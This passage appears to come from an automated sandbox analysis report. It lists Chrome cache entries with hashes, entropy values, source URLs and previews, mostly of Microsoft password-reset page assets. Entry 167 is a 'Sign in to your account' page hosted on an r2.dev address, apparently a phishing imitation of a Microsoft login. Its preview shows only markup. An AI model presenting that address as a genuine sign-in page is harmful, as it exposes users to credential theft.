Preview:	.paddingright { padding-right: 20px; }...paddingleft { padding-left: 20px; }...paddingright7 { padding-right: 7px; }...paddingleft7 { padding-left: 7px; }...paddingleft10 {padding-left: 10px; }...alignright { text-align: right; }...alignleft { text-align: left; }...leftalign {text-align: left; margin-left:0px;}.....borderRight {border-right: 1px solid black; padding: 0px;}.....userTypeRadioButtonMargin{margin-left: 10px; margin-top:50px;}...userVerificationInputLabel {text-align:left;padding-right: 10px;}...radioButtonMoreInformation { padding-left: 20px }.....header .logo{float:left; padding-left:30px;}.....HelpCallout td.PosRight{padding: 8px 0px 0px 0px; margin: 0px; vertical-align: top; font-size: 1px; border: none !important; background-color: transparent !important;}...HelpCallout td.PosRight > div{font-size: 1px; position: relative; left: 1px; border-bottom: none !important; border-right: none !important; border-left: none !important; width: 15px; background-color: transparent !

Chrome Cache Entry: 155

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1864
Entropy (8bit):	5.222032823730197
Encrypted:	false
SSDEEP:	48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
MD5:	BC3D32A696895F78C19DF6C717586A5D
SHA1:	9191CB156A30A3ED79C44C0A16C95159E8FF689D
SHA-256:	0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
SHA-512:	8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

Chrome Cache Entry: 156

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	3005
Entropy (8bit):	4.3348196756520005
Encrypted:	false
SSDEEP:	48:ITWNX9q7aVxyFGwvqNTTswh11KdA/IMUitKhyWirt+NG/BC0/PTfhyr1+18:IiNX9oFG4qTJb0a/IMNURkt6GJZ/7fU7
MD5:	A870B45AC5D6B0D4E18C4829C7B660B4
SHA1:	2D3CA0E1F19EFDEB9B2DD3DCFFB17F8ABA118AA0
SHA-256:	144524233F795D6A425B76F7AE5C0BB622B5F67E2E6AE73532AD526528CA07CF
SHA-512:	295A21307D452F4BF51C62770C6A6B43CDB8B5A6BFA3617E068C8550285252B88F8BBF93A81C39E4BD7F73645EE094EDE0E2733DAFA5094E3EBAE20033363270
Malicious:	false
Reputation:	low
URL:	https://passwordreset.microsoftonline.com/WebResource.axd?d=noQ-NRy2ZIz1bUHme5MeuhamNa6C_BwqixBCCGo0wgmzbIebj3ZYEOeWoUytJr12gWPsDGW3S955m8mGkzQ5T5MX5DQRbCnh5mcNaiHzQHvTtvkFomZVHF4_KTNLClgSPdEEJwIJ_FIMQ4aWig1_1g2&t=638509456396079063
Preview:	function WebForm_FindFirstFocusableChild(control) {.. if (!control \|\| !(control.tagName)) {.. return null;.. }.. var tagName = control.tagName.toLowerCase();.. if (tagName == "undefined") {.. return null;.. }.. var children = control.childNodes;.. if (children) {.. for (var i = 0; i < children.length; i++) {.. try {.. if (WebForm_CanFocus(children[i])) {.. return children[i];.. }.. else {.. var focused = WebForm_FindFirstFocusableChild(children[i]);.. if (WebForm_CanFocus(focused)) {.. return focused;.. }.. }.. } catch (e) {.. }.. }.. }.. return null;..}..function WebForm_AutoFocus(focusId) {.. var targetControl;.. if (__nonMSDOMBrowser) {.. targetControl = document.getElementById(focusId);.. }.. else {.. targetContro

Chrome Cache Entry: 157

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	1561
Entropy (8bit):	7.762338770217686
Encrypted:	false
SSDEEP:	48:c/CeK/fE+XoVldIkPdTWbuf173xX964boBdIhLE:ntcx/Iksbuf17f64borIK
MD5:	8DC34013E911C5F68FC2BCA0400CB06F
SHA1:	16BAFA91AF100D65C4945F04E0C6E1643B98CF00
SHA-256:	795029D360C3D16233FCE96F1BFF13C261535C0885FAE806CFF766F32D96BCEE
SHA-512:	83ACA42A30BFD629BC1E88D3ED154475E7949C1B154D19E6C9EF1DE825BA7967C0B6DA9EE79E7B420668242CCE5931DF344C97278A254F0A72C3D09EABED6051
Malicious:	false
Reputation:	low
URL:	https://client.ppe.repmap.microsoft.com/Images/hipaudioplay.png?vv=100
Preview:	.PNG........IHDR...<...<.....:..r....sBIT....\|.d.....pHYs...........S.....tEXtCreation Time.05/06/16...o....tEXtSoftware.Adobe Fireworks CS6.....qIDATh..=l.E.....H..H*.\|... ...&.D..).@....&...N....)_.E ...(.p...p(H...Ht... ..0............i.}s.....{`ss....;.......:...u..."....Az.r.%.9.\|....wU.j...o....N4...~....g.u.=`.;..9.7.%....Ad#......9....~7.....&.a........`]x^D....&,"..kv.l..K.S+!....#{.xm.;..%.+F<.\..#...bN...2...\.".I..U]..#.dWy$."r.2;Z...w)oD..H..u..M.'.k70.<4aG..`'~......k31W.2!Ue.A"..j....X..C...dNUd.... .j.\|c."..../..P.MXD......C`>7Y.K...n.....U..#..^4....Uu...Q.);.`9q.53..n.@.......A6.E,6.-d; ........nl.>..."..N7..9\6.....p^a..4aG...3...gUu#..j...2............f.....^.)...Udo'&..G.C.Z...L).....".t...pCD..n..a.....E....F...o.k.Y+b...[...gT..... ...]....V..m.!\..SCwh8w..J^.3N........\.W.....3.....lP.Da........-..........@_...i......r..%..)E.Q...3..M..o.$...`...".......-/EHIDZ.q.MC.......D.Q..".. ..#...................1...p.x?dKP.=...{u\.

Chrome Cache Entry: 158

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1864
Entropy (8bit):	5.222032823730197
Encrypted:	false
SSDEEP:	48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
MD5:	BC3D32A696895F78C19DF6C717586A5D
SHA1:	9191CB156A30A3ED79C44C0A16C95159E8FF689D
SHA-256:	0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
SHA-512:	8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
Malicious:	false
Reputation:	low
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

Chrome Cache Entry: 159

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 16 x 25, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	405
Entropy (8bit):	6.927238031773719
Encrypted:	false
SSDEEP:	6:6v/lhPGtyR8R/Chm+jnDs9cCXz6fXIpvI+WOcy0f11VTaENo+7PfW3e37zt1afwp:6v/7SyG/HYfXJOvU1zTa8o+W8
MD5:	D4FFE61373F6AA32EEB8CA7CD41AB980
SHA1:	4925FAC4BC73EFB7C7BBC32B11C435ECF1D61674
SHA-256:	D5C54FFC6B8BD44D932BE8F37B1CD5B666205C7574F9D56EF68E56F83E08FFAD
SHA-512:	0F7EDE96F20BB3C053C246FFE1EF8CE739CEF7757FAAED031A365299B88664A046557C2C7FDB3BADED070BA4EBA1A14950D7E3A066B4976BF07142CEFA48BEEB
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.............8.......sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.Adobe ImageReadyq.e<....IDAT8O...0...nf..y.,X4.g.I.h4..H.`.b.bA..f.n....%.=.iS.?N....^....A.(...~.i..m[.Qyz..iB..(...8...<G.........y..$.8....EQ.u]..I..(R.l...a...=..?t...CUU.......-..7.!..@.u0\..y.@..[a...p@.J.......e..>.Y..i..>A...+.,[. X9..z....B.4..+)..`n/..Q..>...y....e<....IEND.B`.

Chrome Cache Entry: 160

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 89 x 18, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1805
Entropy (8bit):	7.265265285391204
Encrypted:	false
SSDEEP:	24:oV1hpunQWwjx82lY2T32HEV8KJyJ3VAyKOGpxbAKJcyIXRP6VEBxX4pAE60KKAU9:4itNn2VMJ3R6breHDBBThFtYeD5B2
MD5:	BC89C1FBFBC227DC5A7ED9B2797E240D
SHA1:	8A9390297FDD0963C466CF2FD35D5B1F88A46B6A
SHA-256:	744A8CD0A4D15DFCF4A5D2E832FF556D950F8AF24D7B66104AB2EF4FE2605D9A
SHA-512:	C18F6B22F4AC5040E3FEBE8034AD3A3A3EF32CF3384BE6C3144B2EB04080F03111743D5B30AF3A1343AFD68A20AAE5972422C724107243D00CD9CF263DDC10C7
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...Y.........0.r.....sRGB.........gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:BABFACAF901511E2BD4FDE5C526470CF" xmpMM:DocumentID="xmp.did:BABFACB0901511E2BD4FDE5C526470CF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:BABFACAD901511E2BD4FDE5C526470CF" stRef:documentID="xmp.did:BABFACAE901511E2BD4FDE5C526470CF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..R....fIDATXG.mq[1.E.!...3&...P.................3..~L..q.O..t..{...v?..n.....b#.-.i..

Chrome Cache Entry: 161

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1169), with CRLF line terminators
Category:	downloaded
Size (bytes):	52368
Entropy (8bit):	4.698697974080988
Encrypted:	false
SSDEEP:	768:3VNBSzjr1cjwIRiL5IBRe7RMCb9WlQfWGfAlBRsYXzrSSl:3V6XYrRpBRe7eCwlQfWGfAlBRsYX6Sl
MD5:	B5EF4FACFD9F9112A1A1C6FDFA03216F
SHA1:	AAE241A7A5FA1D623F1561E9CC81CC51D7D3A003
SHA-256:	824B6E3F4B109F8835C32FF4E6062659E3ADC928404862D16CC6079E2882E8F3
SHA-512:	985595B13C5364BFA712DE23813645100B10DDF6442D153BDC87D96AED9E4FB927CCC22DD3BE0F1CA47CF26539DAFA25B0F040804AAF90CE35002B62322EF682
Malicious:	false
Reputation:	low
URL:	https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2freprocess%3fctx%3drQIIAYWSu4vTAADGm_au1zvQO0VEEeQGBxXS5tU8Kg49m0uba5LWJO0lgyVt0jyaV9u0aTIdTo43OdwkIg4nLk4iiDffdIuLoyCIgxxOiou9v8Dlgw9-fMv321jDi2QRKkL3c3ARrtzBUKysEX0KpDQcBTEKhkANQ3AQLaM4ikCwXobQydWNrQP6258nN7_Sr3efvnn1-fzvMXDbiqJwWimV4jguBsOhPTCKg8AruZqv2775HgDOAOA7ABxlVw0flMXj7BRHCRzFSJzCcQzBYAinigrCJbzE2mqXjlSmjSgJBPEevWhKZswz7YhH5ITzOJj3VFeoWY66ZHlGhjlmyTs0xj1a8qluNbuspUijiPd4m5eqsSApy53O6Et2U6jOIgu5iGBip8av7PowmHi9MJhGR7nn2YlpRA1nFOm2WWtFCian7LSh2qbLNxGQjOtE0yL0RJtbLT1g91TIjljHpgYttGeIC7_pDQfueMF1zJDSGMVE6WqDEXFWwtvKUBLS_VQQSXjIk464GzHJqDkLU6xOmi5EJCEqzOmpk87mCYmEYrutN4ZUn9ujPTcZDagIdvpwYKhpDZwlrTFIWb3I1H1kZIug2yCEMcu0SEXq-QuC1z153JrLUoDAEYjUFTFs99vYXOt03J2eXN-btYxJzbGZVNUbEJ4ws2RB7ldHeNmtph6PonKP6gwm83A6ZQPJEbvxu1x-eaYX-Ke5y0Fo-La-HU6Coe0aZyvAj5XrhfxW4UZmO3P3GpSrFAobW5mL9nsFeLm6tEU-qDz4ufmRfvvi3q2TT4eZ09VSXVW7jiA1-qQSsIsBYcCxxPnCTuQmlkSNISTAm_N-jdEI7CFcgQ_zwGE-f5q_0qj1eFoSpSpfqz6uIT3oPA88W8t8WP-PfyeXMv8A0&mkt=en-US&hosted=0&device_platform=Windows+10
Preview:	..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">..<head><title>...Microsoft Online Password Reset..</title><meta http-equiv="x-ua-compatible" content="IE=9" /><meta http-equiv="Expires" content="0" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Cache-Control" content="no-store, no-cache" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="robots" content="noindex, nofollow, NOODP, NOYDIR" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link id="FavoriteIcon" rel="Shortcut Icon" type="image/x-icon" href="favicon.ico?v=1342177280" />.... <script src="//ajax.aspnetcdn.com/ajax/jQuery/jquery-3.6.0.min.js" type="text/javascript"></script>.. <script type="text/javascript">window.jQuery \|\| document.write('<script type="text/javascript" src="js/jquery-3.6.0.min.js">\x3C/sc

Chrome Cache Entry: 162

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1525
Entropy (8bit):	4.80220321270831
Encrypted:	false
SSDEEP:	24:jQB6rLbbhhye8jDjpfj/MALSj0eajoq0MgV05SkuVTgEbwe/sT5wiMa3sr6sHr3H:j8eLrynvlwIeyoJMluVEE0B7srH
MD5:	ACA0F1B02DC406E76DDC5F2BDEBEC6CE
SHA1:	594C930BE86B8843377565E349D2A10F1755A13A
SHA-256:	0446C6FD9AEB7DCD7CC089FA25323B1AE9AFA77B4CF8D4449F7D2D1B2467393A
SHA-512:	06887860F73D38799FFF8BF5B2972160B68C303EC904813861190E9A8A6477E4D300882994D661FDFC118C408625C537D8B28287DC9941D50302BD91C88ED98F
Malicious:	false
Reputation:	low
URL:	https://passwordreset.microsoftonline.com/js/Common.js
Preview:	.....function GetCookieValue(cookieName)..{.. if (document.cookie == undefined \|\| document.cookie == "").. return "";.... var name = cookieName + "=";.. var cookieArray = document.cookie.split(';');.. for (var i = 0; i < cookieArray.length; i++).. {.. var clientCookie = cookieArray[i].trim();.. if (clientCookie.indexOf(name) == 0).. {.. return clientCookie.substring(name.length, clientCookie.length);.. }.. }.. return "";..}....function DeleteCookie(name)..{.. if (GetCookieValue(name).length > 0).. {.. document.cookie = name + "=" + ";expires=Thu, 01 Jan 2000 00:00:01 GMT";.. }..}....function GetUserSessionData(key) {.. var sessionStorage = window.sessionStorage;.. if (sessionStorage[key] == null) {.. return "";.. }.. return sessionStorage.getItem(key);..}....function SetUserSessionData(key, value) {.. var sessionStorage = window.sessionStorage;.. sessionStorage.setItem(key, val

Chrome Cache Entry: 163

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	68
Entropy (8bit):	4.625316929997096
Encrypted:	false
SSDEEP:	3:tpSf4Ck8efFlK5ly:tak8efFlyly
MD5:	D1690731F22021E1466FBCD0DB6326EF
SHA1:	78F95BA0B7F82BBB7067000242DE860594ABD9C3
SHA-256:	490216DF4F089BB5C249BCF4034D0671254CA4236EC3ECA935AAC4B17E0FC7F3
SHA-512:	10B3CE812684D28DC72B74BA220E9A0DEE38550D49D25BB40B9EEB8764EE386E5F530D28A5E7C8E159B5C672D85D8649B102F3F04BD96092F9787ACACA4DBDF1
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISLAnYh4U85ulXExIFDURbFPwSBQ2L4FIoEgUNxK_d4xIFDW1rCkoSBQ2VKJT-?alt=proto
Preview:	CjEKCw1EWxT8GgQIZBgCCgcNi+BSKBoACgcNxK/d4xoACgcNbWsKShoACgcNlSiU/hoA

Chrome Cache Entry: 164

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	46376
Entropy (8bit):	4.760560792293901
Encrypted:	false
SSDEEP:	768:QgRN7ChZGd/5zEhQ49zXWV/eTSLtiMK7OQyOYZ:V1d/5edgVrlH
MD5:	DBFAC7887A157C9B73DC42927FC15B74
SHA1:	435FD188BF66F0207EEB298DD13228D17D36E4D1
SHA-256:	FC66E3943BC6EDC7B1F79D952D31DABCBA3BD576190DEEB9A7518CEE6B75C5A1
SHA-512:	C1918B35A03BD2110C2CB4EAD140BA342C54EE7BEE2C1E4B6582B56B86DA93AECDDA92DA626C7B15BDEBC067893ACD354919495551E71EE0C9D5993B43433958
Malicious:	false
Reputation:	low
URL:	https://passwordreset.microsoftonline.com/js/Webtrends.js
Preview:	// WebTrends SmartSource Data Collector Tag..// Version: 8.6.2..// MS Version: 3.2.5..// Tag Builder Version: 3.0..// Created: 04/01/2011..function WebTrends() {.. var that = this;.. if (typeof (gDcsId) != "undefined" && gDcsId) this.dcsid = gDcsId;.. else this.dcsid = "not_a_valid_dcsid";.. if (typeof (gDomain) != "undefined" && gDomain) this.domain = gDomain;.. else this.domain = "m.webtrends.com";.. if (typeof (gTimeZone) != "undefined" && gTimeZone) this.timezone = gTimeZone;.. else this.timezone = -8;.. if (typeof (gFpcDom) != "undefined" && gFpcDom) this.fpcdom = gFpcDom;.. else {.. if (/microsoft.com$/.test(window.location.hostname)) {.. this.fpcdom = ".microsoft.com";.. } else {.. this.fpcdom = window.location.hostname;.. }.. }.. if (typeof (gOffsite) != "undefined" && gOffsite).. if (gOffsite == true \|\| gOffsite == "true") this.fpcdom = "";.. this.navigationtag = "div,table";.. if (typeof

Chrome Cache Entry: 165

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 22 x 22
Category:	downloaded
Size (bytes):	478
Entropy (8bit):	7.072122642964318
Encrypted:	false
SSDEEP:	12:d44xCq3nQQ5Q36sd0Tc/ET4Io9yjPy00EjNF8:d40CqXQQ5E69qEkI4Wy0lNF8
MD5:	309B41EE7A44BD51E5D1B52CCC620E5B
SHA1:	B162CE55DE01BF7C005F8CE4D4D7C32E7AEACA08
SHA-256:	F213507641FD02EC43981535823474ECFDE973D1B33A6CD385F1F0827FD4B528
SHA-512:	9279138126F8FEDD3AEF32BA4BCD78D3D26BBD4E7DE6F3B21014B96C34D7E69BC4C6471CC94772346CB6C7F9020EB5FE1A3A96686A5B250F5CCDEE54A0936F4D
Malicious:	false
Reputation:	low
URL:	https://passwordreset.microsoftonline.com/images/hip_text.gif
Preview:	GIF89a.....;....333..........ZZY.........fff.........ssr...........................................................................................MML.........@@@....................................!.....;.,.............p.+.....9.P'..D.`..........t..pB\C.k..n...[..x7hRt..x7-}.92....}%p5.+..8..9552...n2...#.3//...3../33..."..3+.../9..22....3....+./.9.2......9.........3.....}(.).....5..........7......`...........,"J....D>Dlh...F4D(..I..I..@...!..0]B..d%..w...;

Chrome Cache Entry: 166

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 89 x 18, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	1805
Entropy (8bit):	7.265265285391204
Encrypted:	false
SSDEEP:	24:oV1hpunQWwjx82lY2T32HEV8KJyJ3VAyKOGpxbAKJcyIXRP6VEBxX4pAE60KKAU9:4itNn2VMJ3R6breHDBBThFtYeD5B2
MD5:	BC89C1FBFBC227DC5A7ED9B2797E240D
SHA1:	8A9390297FDD0963C466CF2FD35D5B1F88A46B6A
SHA-256:	744A8CD0A4D15DFCF4A5D2E832FF556D950F8AF24D7B66104AB2EF4FE2605D9A
SHA-512:	C18F6B22F4AC5040E3FEBE8034AD3A3A3EF32CF3384BE6C3144B2EB04080F03111743D5B30AF3A1343AFD68A20AAE5972422C724107243D00CD9CF263DDC10C7
Malicious:	false
Reputation:	low
URL:	https://passwordreset.microsoftonline.com/images/header_microsoft.png
Preview:	.PNG........IHDR...Y.........0.r.....sRGB.........gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:BABFACAF901511E2BD4FDE5C526470CF" xmpMM:DocumentID="xmp.did:BABFACB0901511E2BD4FDE5C526470CF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:BABFACAD901511E2BD4FDE5C526470CF" stRef:documentID="xmp.did:BABFACAE901511E2BD4FDE5C526470CF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..R....fIDATXG.mq[1.E.!...3&...P.................3..~L..q.O..t..{...v?..n.....b#.-.i..

Chrome Cache Entry: 167

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (65131), with CRLF line terminators
Category:	downloaded
Size (bytes):	114288
Entropy (8bit):	5.336075317561924
Encrypted:	false
SSDEEP:	1536:DxoBMCgKy+U5KazA/PWrF7qvEAFiQcpm2CkMgpC490RS67MxUkbjqM:loBgp4490L6
MD5:	F717A896CF591D9A08D0E74947A3EC53
SHA1:	6E9B7379D66F52A439ACBD60EBC4ED7C1C85B6BB
SHA-256:	05E5D3F748E3291E8A03CB908CFC9D862AE8CC43BA52A3223DDBBD8EDE19D4EF
SHA-512:	5BDA867A35818CD7B47AA30F9497F8E1694E8B3B27C173404E92E42E625FD37DABC398145A2AC3A48A2777A133FB442BFCA877CA2160377B668C1032D8A4D15A
Malicious:	false
Reputation:	low
URL:	https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html
Preview:	<html dir="ltr" lang="en">..<head>...<title>Sign in to your account</title>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">...<meta http-equiv="X-UA-Compatible" content="IE=edge">...<meta name="robots" content="none">...<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2.0,user-scalable=yes">...<link rel="shortcut icon" href="favicon.ico">...<style>...html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size

Chrome Cache Entry: 168

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 22 x 22
Category:	dropped
Size (bytes):	478
Entropy (8bit):	7.072122642964318
Encrypted:	false
SSDEEP:	12:d44xCq3nQQ5Q36sd0Tc/ET4Io9yjPy00EjNF8:d40CqXQQ5E69qEkI4Wy0lNF8
MD5:	309B41EE7A44BD51E5D1B52CCC620E5B
SHA1:	B162CE55DE01BF7C005F8CE4D4D7C32E7AEACA08
SHA-256:	F213507641FD02EC43981535823474ECFDE973D1B33A6CD385F1F0827FD4B528
SHA-512:	9279138126F8FEDD3AEF32BA4BCD78D3D26BBD4E7DE6F3B21014B96C34D7E69BC4C6471CC94772346CB6C7F9020EB5FE1A3A96686A5B250F5CCDEE54A0936F4D
Malicious:	false
Reputation:	low
Preview:	GIF89a.....;....333..........ZZY.........fff.........ssr...........................................................................................MML.........@@@....................................!.....;.,.............p.+.....9.P'..D.`..........t..pB\C.k..n...[..x7hRt..x7-}.92....}%p5.+..8..9552...n2...#.3//...3../33..."..3+.../9..22....3....+./.9.2......9.........3.....}(.).....5..........7......`...........,"J....D>Dlh...F4D(..I..I..@...!..0]B..d%..w...;

Chrome Cache Entry: 169

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
Category:	dropped
Size (bytes):	621
Entropy (8bit):	7.673946009263606
Encrypted:	false
SSDEEP:	12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
MD5:	4761405717E938D7E7400BB15715DB1E
SHA1:	76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
SHA-256:	F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
SHA-512:	E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
Malicious:	false
Reputation:	low
Preview:	..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......\|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E..".......x.@..?u......../....8...

Chrome Cache Entry: 170

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 24 x 24
Category:	downloaded
Size (bytes):	2463
Entropy (8bit):	6.994052150121201
Encrypted:	false
SSDEEP:	48:H0itvnLUG0J3nL8VO2ocia6Dk4MAbpGW4YBE/2p:HfNmT2QDnMAbsWTp
MD5:	93DE6FB07C1382459E473381DA5D0E7E
